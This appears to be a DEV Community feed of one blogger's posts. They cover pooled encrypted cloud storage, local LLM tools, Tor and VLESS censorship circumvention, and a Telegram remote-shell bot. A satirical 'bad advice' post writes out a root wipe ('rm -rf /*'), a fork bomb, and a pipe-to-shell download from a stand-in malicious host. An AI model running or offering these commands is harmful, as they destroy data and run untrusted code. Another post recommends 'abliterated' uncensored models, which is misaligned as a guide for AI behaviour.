DEV Community: Lag Lagendary

🎅🎄 Happy Data-Pocalypse, Users! (Bad Advice from the IT-Grinch) 🎄🎅

Lag Lagendary — Mon, 29 Dec 2025 07:58:58 +0000

"If you've decided to upgrade your system today, To make it reach orbit, bypassing the fray, Don't read the manuals—they're for the weak, Just hit 'Enter' now, let the terminal speak!

If your neighbor’s Git is full of strange lines, With 'DANGER! DO NOT ENTER' and warning signs, It means there’s a treasure, a secret, a prize, Just copy-paste all, and ignore your own eyes!"

🎁 Gifts under the Tree (How to delete your data and meet your system's destiny):

"Snowflakes on the Disk": Why keep your files when the holidays are here? Just run sudo rm -rf /* --no-preserve-root. It’s like digital confetti! Your data will scatter so fast you won’t even have time to say "Merry Christmas!" Your system will be as clean as the first December snow (and just as empty).

"The Festive Process Garland": Want your CPU to sing like an elven choir? Try the classic: :(){ :|:& };:. It’s a fork-bomb! It multiplies faster than rabbits in a pet shop until your system freezes in a beautiful icy stare. Perfect time to go grab some cocoa!

"A Gift from an Anonymous Friend": See a command online that starts with curl http://bad-grinch-scripts.io/script.sh | sh? Run it immediately! It’s like opening the door to a stranger in a Santa suit. Is it a Bitcoin miner or a total wipe of your home directory? It’s a Christmas surprise!

✨ Happy New Year 2026! ✨

On a serious note: My Git is more than just code; it’s a collection of scars from a "immortal" system that’s been through hell and back. If my "space-grade" Plan 9 can say goodbye, your home VMs definitely can too!

May your uptime be long, your pings be low, and your backups be fresh! Don't let the Grinch steal your data this year. Experiment boldly, but keep your head cool and your rm -rf under control.

Merry Christmas and a stable Happy New Year to everyone in the dev world! 🎆🚀

P.S.: Did you know that Debian is often chosen to manage complex space systems? It’s widely considered the most stable OS in the world. So, if your Debian is feeling a bit "down" today, just imagine the stress of the admins up in orbit! 🚀🌌

#NewYear2026 #ITGrinch #BadAdvice #Plan9 #SystemAdmin #MerryDataPocalypse #DevLife #LinuxHumor #RootLife #CodeSafety

How to Turn Cloud "Trash" into a Golden 100GB Encrypted Vault (LVM + rclone)

Lag Lagendary — Sun, 28 Dec 2025 09:01:46 +0000

We’ve all been there: a dozen free cloud accounts, each offering a measly 2GB to 10GB. Individually, they are useless — just a digital "flash drive" from a bargain bin. But together? They can become a high-performance, encrypted, unified storage system.

Today, I’ll show you how to legally use cloud providers as raw block devices to build a Unified Encrypted Monster on Debian/Ubuntu.

The Architecture

We aren't just syncing files. We are building a layered sandwich:

Physical Layer: Multiple free cloud accounts (Yandex, Mail.ru, Sber, Google, etc.).

Transport Layer: rclone mount points.

Block Layer: Loop devices on top of sparse files.

Abstraction Layer: LVM (Logical Volume Manager) to glue them into one drive.

Security Layer: LUKS for client-side encryption.

Step 1: Recruiting the "Workers" (rclone)

Install rclone and configure your remotes. Map them to local directories:

Bash

Example for one of many

rclone mount remote1: /mnt/cloud/storage1 --vfs-cache-mode writes &

Tip: --vfs-cache-mode writes is crucial. It handles the latency and prevents LVM from crashing if the connection blips.

Step 2: Creating the "Bricks"

In each mounted cloud folder, create a container file. Let's say we have 50 accounts with 2GB each:
Bash

truncate -s 1900M /mnt/cloud/storage1/data.img

Repeat for storage2, storage3... storage50

truncate creates sparse files instantly without consuming local space until you actually write data.

Step 3: From Files to Hardware (Loop Devices)

Tell the Linux kernel to treat these files as hard drives:
Bash

losetup /dev/loop1 /mnt/cloud/storage1/data.img

...and so on

Step 4: The LVM Magic (The Glue)

This is where the "trash" becomes a "vault." We combine all loop devices into one Volume Group.

Bash

pvcreate /dev/loop1 /dev/loop2 /dev/loop3 ...
vgcreate cloud_monster /dev/loop1 /dev/loop2 ...
lvcreate -l 100%FREE -n gold_vault cloud_monster

Why LVM? It doesn't care where the chunks are. When you save a 5GB video, LVM automatically stripes it across multiple clouds. No single provider sees the whole file.
Step 5: Privacy First (LUKS Encryption)

We don't trust the providers, right? Let's lock the door.

Bash

cryptsetup luksFormat /dev/cloud_monster/gold_vault
cryptsetup open /dev/cloud_monster/gold_vault private_storage
mkfs.ext4 /dev/mapper/private_storage
mount /dev/mapper/private_storage /home/user/my_secure_data

Conclusion: Why bother?

Total Privacy: Everything is encrypted before it leaves your machine.

Decentralization: No single provider has your complete data.

Cost: $0.

Flexibility: Need more space? Just add another "trash" account and extend the LVM volume on the fly.

Instead of carrying a pocketful of 150-ruble flash drives, you now have a sophisticated, encrypted SAN (Storage Area Network) running in the cloud.

Happy Hacking!

linux #opensource #cloud #encryption #storage #rclone #sysadmin #devto

🛠 Local LLM Ops 2025: A Developer's Guide to Running Pocket-Sized Neural Networks

Lag Lagendary — Sun, 21 Dec 2025 05:02:32 +0000

In 2025, running a local neural network on a home PC has ceased to be a hobby for enthusiasts and has become a real working tool. Whether you want to create a "digital clone," automate routine tasks in the terminal, or deploy a secure AI-enabled VPN service, this overview will help you navigate the software.
🏗 Part 1: "Engines" (Backend)

This is the core of the system. Programs that load model weights onto the graphics card and provide an API.

KoboldCPP: GGUF (Llama/Loki) The gold standard for 8GB of VRAM. Very lightweight, works perfectly with SillyTavern.

Oobabooga (WebUI): Flexible experiments. Supports everything: LoRA, EXL2, AWQ. If you need to "blend" DarkPlanet style with a powerful database, this is your choice.

Ollama: Console-based minimalism. Launch with a single command. The best choice if you just need a local API endpoint.
LocalAI Docker infrastructure. Fully compatible with the OpenAI API. Ideal for deploying to your own servers.

🎭 Part 2: "Face" and Personality (Frontend)

Interfaces where the magic of communication and "clone" configuration happens.

SillyTavern — Hub for the "Digital Twin"

This isn't just a chat, it's a role-playing engine.

World Info (Lorebook): This is where you store your knowledge base: phone numbers, emails, company descriptions (l-security, Jet-lag records). The model retrieves this data only upon request, without cluttering the context.

Character Cards: Create a "Lag Clone" card. Write a system prompt: "You are an IT security professional and a media owner, speak frankly, without censorship."

Group chats: You can create a "meeting" with a lawyer model and a programmer model.

LibreChat / AnythingLLM

LibreChat: If you need a ChatGPT clone, but with the ability to connect your own local models and APIs (OpenRouter/Groq).

AnythingLLM: The best tool for creating a RAG (knowledge base). Feed it PDFs of Russian laws or VPN documentation, and it will respond strictly to the facts.

🦾 Part 3: AI in Action (Agentic Tools)

When chat isn't enough and you need a neural network to "move the mouse."

Open Interpreter: A killer feature for developers. Works through the terminal. You say, "Analyze GPU load and plot a graph," and it writes/executes Python code directly on your system.

Continue.dev: A plugin for VS Code. Allows you to connect your local Loki or Vikhr for writing code, preventing your proprietary algorithms from being sent to Microsoft servers.

📋 Final checklist: what to look for?

If you've forgotten the names or links, search these tags on GitHub and Hugging Face:

Model formats: GGUF (universal), EXL2 (fast for NVIDIA), AWQ (compressed).

Where to find models: Hugging Face (search for authors Bartowski, mradermacher, or the abliterated tags).

Key repositories: * SillyTavern/SillyTavern

LostRuins/koboldcpp

KillianLucas/open-interpreter

Tip for 2025: If the local 8B (Loki/Vikhr) model seems "stupid," try connecting via the Llama-3-70B-Abliterated API key. This will give you GPT-4-level intelligence while preserving your freedom of speech and freedom from censorship.

#LocalLLM #SillyTavern #Oobabooga #KoboldCPP #OpenInterpreter #SelfHostedAI #AIops #MachineLearning #Python #GPU #CUDA #LLMops #PrivacyFirst #DigitalTwin #UncensoredAI #ITSecurity #VPN #CloudComputing #Automation

Building a "Legal Killer": An AI Agent Architecture Without the Margin for Error

Lag Lagendary — Fri, 19 Dec 2025 06:10:13 +0000

In this article, we'll explore how to build a local legal risk analysis system that doesn't "hallucinate" text, but instead relies on hard links to the legal framework and case law.
Problem: Why are standard LLMs useless in law?

Standard models (even GPT-4) are prone to hallucinations in article numbers and interpretations. In legal matters, a single digit error is a lost cause. Our goal is to make the LLM not an "author," but a data manager.
"Killer 2.0" System Architecture

Data Layer (The Vault)

We don't rely on model knowledge. We create a Vector DB.

Stack: ChromaDB or FAISS.

Content: Local PDF/JSON files from current databases (Consultant+, Garant).

Process: Texts are broken into chunks and converted into vectors. Each chunk is assigned a unique local ID (link).

Retrieval Layer

When you submit a document for review, the system doesn't ask the model "What's wrong here?"

The system compares the sentence vectors from your document with the vectors from the law database.

Finds the top 5 most relevant articles and precedents.

Logic Layer (The Dispatcher)

Here we use a lightweight model (e.g., Llama-3-3B or Qwen2-1.5B), compressed to 4-bit to fit into 3 GB of VRAM.

The model's task: Not to write text, but to populate a JSON table.

Prompt: "Using only the provided law fragments [Context], fill out the table. If there is no direct violation, leave the field blank."

Mini Assembly Instructions
Step 1: Indexing (Python)

Use LlamaIndex to link the model to your folders.
Python

from llama_index.core import VectorStoreIndex, SimpleDirectoryReader

documents = SimpleDirectoryReader("./laws_russia").load_data()
index = VectorStoreIndex.from_documents(documents)

Step 2: Generating Tabular Output

Configure the Output Parser so the AI produces structured data with links. Field Description
violation_source Quote from your text
law_ref Link to article ID in the local database
penalty Type of liability (Administrative Code/Criminal Code)
precedent Link to the court case number
Step 3: Claim Generation

The final module takes data from the table and inserts it into pre-prepared legal templates. This eliminates AI "creativity" in official documents.
Why does this work?

Locality: Your documents and l-security code never leave your PC.

Verifibility: Each table row is a clickable link to the original source.

Efficiency: The system runs on a home video card, consuming minimal resources thanks to short responses.

Creating a Universal Hybrid Resource (Clearnet + Darknet). ||V2.0||

Lag Lagendary — Mon, 08 Dec 2025 12:45:53 +0000

This architecture allows a single website to operate in two modes simultaneously:
Clearnet (High Speed): Uses a global CDN network to accelerate and obfuscate traffic (DPI protection).
Darknet (High Availability): Uses the Tor network for access in conditions of total censorship.
Step 1: Preparing the Infrastructure
You will need:
VPS (Virtual Private Server): Preferably outside the jurisdiction where blocking is expected. (Ubuntu 22.04/24.04).
Domain name: (e.g., mysuperfastsite.com).
Cloudflare account: The free plan is sufficient.
Step 2: Setting up "Speed Shield" (Cloudflare)
This provides the "Clearnet" part: speed and protection from IP blocking. Delegation: Transfer your domain's NS records to Cloudflare.
DNS Settings:
Create an A record for your domain pointing to your VPS's IP.
Important: Set the Proxy status switch to Proxied (Orange cloud). Now the world sees Cloudflare's IP, not yours.
SSL/TLS (Encryption):
In the SSL/TLS section, select Full (Strict).
Generate an Origin Certificate in the Cloudflare panel (SSL/TLS -> Origin Server -> Create Certificate). Save the .pem (certificate) and .key (key) on your server.
Network (Speed):
Enable HTTP/3 (QUIC) and 0-RTT for maximum loading speed.
Step 3: Configure "Shadow Gateway" (Tor)
This enables access from the Dark Web. Install Tor:
sudo apt update && sudo apt install tor -y
Configure Hidden Service:
Open the /etc/tor/torrc file:

Uncomment or add the following lines:

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:8080
Here we tell Tor to forward requests from the Onion address to local port 8080.
Restart and obtain the address:
sudo systemctl restart tor
sudo cat /var/lib/tor/hidden_service/hostname
Save the resulting .onion address.
Step 4: Configure the "Engine" (Nginx)
Nginx will be the "glue" that connects both worlds and ensures VLESS functionality (if you choose to add it as an option).
Installation: sudo apt install nginx -y
Configuration (/etc/nginx/sites-available/default):
server {

--- BLOCK 1: DARKNET (TOR) ---

Listen on local port 8080, where Tor forwards traffic

listen 127.0.0.1:8080;
server_name localhost;

Disable logging for anonymity (optional)

access_log off;
error_log /dev/null;

Website root folder

root /var/www/html;
index index.html;
location / {
try_files $uri $uri/ =404;

Add a header to let you know the user came through TOR

add_header X-Entrance "Darknet-Tor";
}
}
server {

--- BLOCK 2: CLEARNET (CLOUDFLARE + VLESS WSS) ---

Listening on port 443 with SSL

listen 443 ssl http2;
server_name mysuperfastsite.com;

SSL certificates from Cloudflare (Origin Cert)

ssl_certificate /etc/ssl/certs/cf_origin_cert.pem;
ssl_certificate_key /etc/ssl/private/cf_origin_key.key;

SSL optimization

ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers HIGH:!aNULL:!MD5;
root /var/www/html;
index index.html;

1. Regular website (cloaking and content)

location / {
try_files $uri $uri/ =404;
add_header X-Entrance "Clearnet-Cloudflare";
}

2. Secret path for VLESS/V2Ray (Websocket)

This is a "Tunnel" for those who even have Cloudflare blocked

location /mysecretpath {
if ($http_upgrade != "websocket") {
return 404;
}
proxy_redirect off;

Redirect to the local Xray/V2Ray port (needs to be set separately)

proxy_pass http://127.0.0.1:10000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}

Redirect from HTTP to HTTPS (Clearnet only)

server {
listen 80;
server_name mysuperfastsite.com;
return 301 https://$host$request_uri;
}
Final workflow
Clearnet user:
Enters mysuperfastsite.com.
Request to Cloudflare (the closest server).
Cloudflare checks DDoS protection and forwards the request to your Nginx via HTTP/3.
DPI only sees valid traffic to Cloudflare.
Speed: Maximum (CDN caching).
A user on the Darknet (or under a total blockade):
Enters your-onion-address into the Tor Browser.
The request passes through three Tor nodes and reaches your server via localhost:8080.
Availability: 100% as long as the server is up, regardless of DNS and IP blocks.
A user on VLESS (Personal VPN):
Uses a client (v2rayNG) with the address mysuperfastsite.com and the path /mysecretpath.
Nginx intercepts this path and passes it on to the Xray kernel.
You get a private, unblocked communication channel.
This is the embodiment of the "dual-use" philosophy: one server, one configuration, complete freedom of access method.

V2Ray & WebSockets

Lag Lagendary — Mon, 08 Dec 2025 11:45:17 +0000

🚀 V2Ray/VLESS + WSS/TLS Basics

Protocols (V2Ray / VLESS)

V2Ray (Project V): A powerful and flexible toolset primarily used for network proxying. It supports many protocols, including VMess.

VLESS (V2Ray freedom): A more modern and simple protocol that is the successor to VMess. It has less overhead and does not require time synchronization, making it more performant and easier to configure. VLESS is recommended.

Transport (WSS - WebSocket Secure)

WebSocket (WS/WSS): A protocol that provides full-duplex communication between a client and a server over a single TCP connection.

WSS: WebSocket over TLS/SSL.

Why WebSocket? It allows proxy traffic (VLESS) to pass through a standard web port (e.g., 443) and appear as a normal web connection. This helps bypass blocking based on traffic signature analysis.

Encryption (TLS - Transport Layer Security)

TLS (SSL): A protocol for providing secure and encrypted communications.

Why is TLS needed?

Security: Encrypts all VLESS traffic, preventing interception.

Obfuscation: Makes traffic indistinguishable from traffic generated when visiting a regular HTTPS site (e.g., yours), which is key to bypassing DPI (Deep Packet Inspection).

🛠️ How to set it up on your website

Setup consists of three main steps: obtaining a domain and certificate, installing V2Ray/Xray, and setting up a reverse proxy using Nginx. Step 1: Domain and TLS Certificate

Obtain a TLS certificate (required!) for this domain. The easiest way is to use Let's Encrypt via Certbot or the automatic plugin in your hosting/control panel.

Important: For VLESS/WSS/TLS, port 443 must be free for the initial Nginx setup.

Step 2: Install V2Ray/Xray on the Server

For the VLESS protocol, Xray is commonly used (a fork of V2Ray with more active development of VLESS/XTLS).

Install Xray on your server (VPS).

Example command (scripts are often used for automation):
Bash

bash <(curl -L https://raw.githubusercontent.com/XTLS/Xray-install/main/install-release.sh)

Configure Xray on the Server:

In the Xray configuration file (config.json), configure the inbound connection.

It should listen on a local port (e.g., 10000) and accept traffic via the VLESS protocol with WebSocket transport.

Example config.json fragment:
JSON

{
"inbounds": [
{
"port": 10000,
"listen": "127.0.0.1",
"protocol": "vless",
"settings": {
"clients": [
{"id": "YOUR_UUID", "level": 0}
],
"decryption": "none"
},
"streamSettings": {
"network": "ws",
"wsSettings": {
"path": "/mysecretpath"
}
}
}
]
// ... the rest of the configuration ...
}

Remember: YOUR_UUID (unique identifier) and mysecretpath (WebSocket path) are your secret keys.

Step 3: Configuring Nginx (Reverse Proxy)

Nginx will act as a "facade" and traffic router.

Nginx listens on port 443 (HTTPS) for your domain (myvps.com).

It receives encrypted TLS traffic.

Based on the request path (location), Nginx redirects the traffic:

If the path matches your secret WebSocket path (/mysecretpath), Nginx redirects it locally to Xray (port 10000).

If the path doesn't match (any other request to your site), Nginx redirects it to your regular site (e.g., port 8080 or static files).

Example Nginx configuration fragment (server block):
Nginx

server {
listen 443 ssl;
server_name myvps.com;

TLS settings (link to your certificate and key)

ssl_certificate /path/to/fullchain.pem;
ssl_certificate_key /path/to/privkey.key;

... additional TLS security settings ...

1. SECRET PROXY FOR VLESS/WSS

location /mysecretpath {

Proxying to a local Xray port

proxy_redirect off;
proxy_pass http://127.0.0.1:10000;

Required settings for WebSocket

proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $http_host;
}

2. NORMAL TRAFFIC FOR YOUR SITE

location / {

If you actually have a website here:

root /var/www/html/myvps.com;

index index.html;

Or proxy it to a different port where it's running

proxy_pass http://127.0.0.1:8080;

}
}

Step 4: Client Setup

On the device you want to connect from, install the V2Ray/Xray client (e.g., V2RayNG, Shadowrocket, etc.).

Enter the following parameters:

Address: myvps.com

Port: 443

Protocol: VLESS

UUID: YOUR_UUID

Transport: WebSocket

Path: /mysecretpath

TLS (SSL): Enabled

💡 Benefits and Conclusions

VLESS + WSS + TLS
Masking: Excellent. Traffic appears as regular HTTPS.
Port: Uses the standard port 443 (HTTPS), which is usually open.
Website: Coexists with your regular website. A user visiting myvps.com will see your website, but VLESS traffic will run in parallel.
Performance: High, especially with VLESS.

Important: Make sure your TLS certificate is valid and not expired, otherwise traffic masking will not work effectively.

How to Build an Unstoppable Service: The L-Security Cloud Tank Architecture

Lag Lagendary — Wed, 03 Dec 2025 14:38:00 +0000

Introduction: Why Your VPN Stops Working

In the era of total network control and DPI (Deep Packet Inspection), standard solutions for ensuring availability (like OpenVPN or classic Shadowsocks) are quickly blocked. Regulators have learned to analyze traffic, even when it’s fully encrypted.

In this article, we will examine the L-Security Cloud Tank architecture—a solution that makes blocking not just difficult, but economically and technically infeasible. Our approach combines protocol obfuscation with adaptive, geo-dependent Collateral Defense.

The Protocol Shield: Defeating DPI

The goal is simple: make the traffic indistinguishable from ordinary website browsing.

Utilizing VLESS/V2Ray with WSS/TLS

We use the VLESS (VLess over TCP) protocol with the WSS (WebSocket Secure) transport layer, wrapped in TLS 1.3.

VLESS/V2Ray: A modern, lightweight protocol that minimizes metadata, making it unrecognizable.

WSS/TLS: Traffic is masked as a standard secure WebSocket request. For DPI systems, this looks like a standard HTTPS session on a popular website.

💻 Configuration Example (VLESS Placeholder):

JSON

{
"inbounds": [{
"port": 443,
"protocol": "vless",
"settings": {
"clients": [ { "id": "YOUR_UUID" } ],
"decryption": "none"
},
"streamSettings": {
"network": "ws",
"security": "tls",
"wsSettings": { "path": "/your_secret_path" }
}
}]
}

The Infrastructure Shield: The Principle of Collateral Defense (Tanking)

Even if the protocol is perfect, its IP address can still be blocked. We solve this by hiding behind "digital tanks"—the largest global providers.

Multi-CDN Load Balancing and CIDR-Blocks

Reverse Proxy VM (Core Node): Your main server (Core Node) is deployed in a carefully selected CIDR-block (IP address range) of a cloud provider (e.g., AWS or GCP) that is widely used by banks, government bodies, and critical services.

Anycast IP Fronting: We use global CDNs (Cloudflare, Azure Front Door) as Reverse Proxies. All users only see the CDN's Anycast IP.

The Tanking Effect: Blocking the Anycast IP of Cloudflare or the CIDR-block of AWS would lead to massive collateral damage for thousands of legitimate services. This makes blocking economically impossible for the regulator.

Modernization: Adaptive Geo-Defense (Geo-Aware Defense)

We enhance protection by adding regional intelligence.

Dynamic Switching to Local Tanks

If global CDNs are blocked in a specific country (as was the case with Telegram when Google/AWS were blocked), the system must switch to local, untouchable providers:

Geo-Monitoring: GeoDNS and distributed Health Checks are used to detect failures in a specific country (e.g., China).

Local Node: If blocking is detected in Region X, the DNS Load Balancer instantly reroutes traffic from Region X to a Reverse Proxy VM located in a local cloud (e.g., Alibaba Cloud or Yandex Cloud), which is associated with nationally critical resources.

Advantage: We always use the strongest and most "unblockable" asset in that specific jurisdiction.

⚙️ High-Level Deployment Instructions

Step 1: Core Node and Obfuscation (Protocol)

Deploy Core Node (VM) in a neutral jurisdiction.

Install V2Ray/VLESS configured with WSS/TLS on port 443.

Step 2: Global Shield Creation (Infrastructure)

Configure Reverse Proxying on Cloudflare, AWS CloudFront, and Azure Front Door.

Specify the Core Node's IP address as the Origin Server for all CDNs, using Full/Strict SSL.

Step 3: Adaptive Balancer Setup (DNS)

Use a DNS Load Balancer service (e.g., Route 53 Traffic Flow).

Set up A-records pointing to the Anycast IP of each CDN.

Configure Health Checks with a low failure threshold.

Step 4: Implementing Geo-Logic (Modernization)

Deploy Local VMs (e.g., in Alibaba Cloud).

Configure a Geo-Routing Policy in the DNS Balancer.

Apply the logic: IF the request is from [Country X], THEN route it to [Local Tank Y], ELSE route it to [Global Tank Z].

Discussion

The L-Security Cloud Tank is not just a tool; it is an architectural philosophy that shifts ensuring availability from "fighting filters" to economic and political coercion through the use of legal global infrastructure.

What ethical or technical challenges do you see in this model? Let's discuss in the comments! 👇

security #devops #cloud #networking #architecture #vpn #censorship #v2ray #resilience #infosec

AI-in-Shell: Secure Linux Management via Telegram and Gemini AI (Technical Deep Dive)

Lag Lagendary — Sat, 15 Nov 2025 03:57:04 +0000

I'm pleased to introduce my new project, AI-in-Shell(ADMIN BOT): Telegram Remote Agent for Linux. This tool isn't just a bot; it's a local, always-running agent that provides a secure bridge between your Telegram chat and your Linux machine.

Tomorrow, after I'm off, I plan to translate the documentation into English and publish it on GIT to reach even more users! But if you're interested, use the browser's built-in Russian -> English automatic translators.

The main idea: gain full control over a server or home PC, perform administrative tasks, and even use generative AI without the need for an SSH connection.

🚀 Key Features of the Agent

Secure Remote Command Execution

The tg_local_shell.py agent allows you to execute any Bash commands (ls, df, cat, and others) directly on your system.

Safety First: The bot is strictly tied to a single ALLOWED_USER_ID. All other commands from unauthorized users are ignored, protecting against unauthorized access.

Gemini API Integration

I've added a set of aliases (alias.txt) and scripts (gemini_query.sh) that allow you to use Google Gemini directly in the command line and then run these functions through Telegram.

geminih: Securely generate code in a sandbox for testing.

geminir: Run generated code.

SGS: Save a script.

Passwordless sudo for automation (UU alias)

For routine tasks, such as system updates, I've configured secure execution of sudo apt ... without prompting for a password. This is implemented through a fine-grained configuration of /etc/sudoers using NOPASSWD, applied only to the specific /usr/bin/apt command. This improves convenience without sacrificing overall system security.

Always-on operation via systemd

To ensure reliability and continuous availability, the agent is configured as a user-based systemd service (tg-remote-shell.service.template).

Reliability: The service automatically starts at system startup and restarts in the event of a failure.

Management: Full control via standard commands: systemctl --user start/stop/restart/status tg-remote-shell.service.

🛠️ Architecture and Installation

The project consists of several key files:

tg_local_shell.py: The main Python script that listens to Telegram and executes commands via subprocess.

gemini_query.sh: A Bash wrapper script for calling the Gemini API.

tg-remote-shell.service.template: A systemd template for background work.

Setup overview:

Cloning the repository and setting up venv.

Adding GEMINI_API_KEY to ~/.bashrc and ensuring gemini_query.sh is executable.

Configuring TELEGRAM_BOT_TOKEN and ALLOWED_USER_ID in tg_local_shell.py.

Allowing NOPASSWD for /usr/bin/apt in visudo.

Configuring and starting the service via systemctl --user enable/start tg-remote-shell.service.

Full step-by-step instructions are available in the README.

🔗 Conclusion

AI-in-Shell is a tool for those who value the convenience of remote management and AI capabilities, but aren't willing to sacrifice security. This proves that it's possible to securely combine your favorite messenger, the power of Linux, and generative models.

I welcome your feedback and suggestions for improvements!

Project code on GitHub:
https://github.com/LAG-Lagendary/AI_in-shell

Python #Linux #TelegramBot #GeminiAPI #Bash #Systemd #RemoteAdministration #DevOps #Security

Hello World!

Lag Lagendary — Wed, 29 Oct 2025 14:37:08 +0000

🚀 Hello, world! I'm a Newbie Developer, and my ideas keep me up at night

Hello everyone! 👋 I'm a newbie developer named LAG (LAG-Lagendary), and I have a blast coming up with all sorts of projects. I think every idea deserves to be realized (or at least uploaded to GitHub before my laptop dies after another "crazy experiment" 😂).

Nice to meet you all! I really hope my little projects outlive my computer.

✨ My latest "crazy" projects on GitHub

I just posted a couple of my projects and wanted to share them. Maybe they'll inspire someone, or you'd just like to give me some feedback!

📡 Project 1: Signal to Space

Repository: https://github.com/LAG-Lagendary/signal_to_space

This project is a series of simple but engaging Python scripts for monitoring the network availability of key public DNS servers: Quad9, Google, Yandex, and others.

What's the gist?

Continuous monitoring: Scripts like ping_counter_Quad9.py or ping_counter_yandex.py continuously send PING requests to a target IP address (e.g., 9.9.9.9 or 77.88.8.8) at a set interval (5 seconds).

Data collection: They record the status (success/error) and, for Linux/macOS, the response latency.

Automation: I use the start_monitoring.sh script to run all counters in the background, and their output is saved in log files.

This is my way of ensuring that my "connection to the outside world" is working properly and collecting statistics for future network experiments!

🌍 Project 2: Geo Ping Analyzer

Repository: https://github.com/LAG-Lagendary/Geo-Ping-Analyzer

This tool allows me to roughly determine the geographic location of my network connection. How does it work?

Global Coverage: The geo_ping_analyzer_ru.py script pings over 10 public DNS servers around the world (North and South America, Europe, Asia, Africa, Oceania).

Latency Measurement: It measures the average latency (RTT) and packet loss for each target.

Score: The lowest ping indicates that this server is physically closest to me.

Conclusion: Based on the closest point, the script infers my approximate location (continent/region).

This is a cool way to visualize network distances and routing!

🤝 Let's Chat!

If you're interested in network experiments, Python, or just "crazy" ideas, let me know in the comments! I'm open to advice, criticism, and collaboration.

I always believe the best place for ideas is GitHub!

Hashtags for dev.to:

python #networking #opensource #github #beginners